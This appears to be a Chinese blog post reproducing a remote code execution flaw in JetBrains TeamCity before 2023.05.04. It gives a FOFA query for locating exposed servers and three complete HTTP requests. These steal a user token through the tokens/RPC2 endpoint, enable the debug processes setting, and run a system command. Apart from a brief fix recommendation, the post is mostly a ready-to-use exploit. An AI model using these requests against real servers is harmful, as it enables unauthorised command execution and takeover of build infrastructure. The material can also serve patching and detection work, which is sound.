Babing
Published on 2024-08-30 / 2 Visits
0
0

J3-2JetBrainsTeamCity-RCE

J3-2JetBrainsTeamCity-RCE

漏洞描述:

JetBrains TeamCity 可通过访问 /app/rest/users/{{id}}/tokens/RPC2 端点获取对应 id 用户的有效 token,携带 admin token 访问受限端点导致远程命令执行或创建后台管理员用户。

影响版本:

TeamCity On-Premises version < 2023.05.04   

网站图片:

image-20240626113832729

网络测绘:

fofa语法:

FOFA:body=“Log in to TeamCity”

漏洞复现:

获取id为1用户的tooken

POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Content-Length: 0


携带tooken修改配置,启动debug模式

POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Authorization: Bearer 用户token
Content-Length: 0

命令执行

POST /app/rest/debug/processes?exePath=whoami HTTP/1.1
Host: your-ip
Authorization: Bearer 用户token
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 0


PS:执行带空格的命令,需要加上Params字段,如下

修复建议:

更新JetBrains TeamCity并审查访问控制,防止通过/app/rest/users/{{id}}/tokens/RPC2端点的未授权访问和潜在的远程命令执行风险。


Comment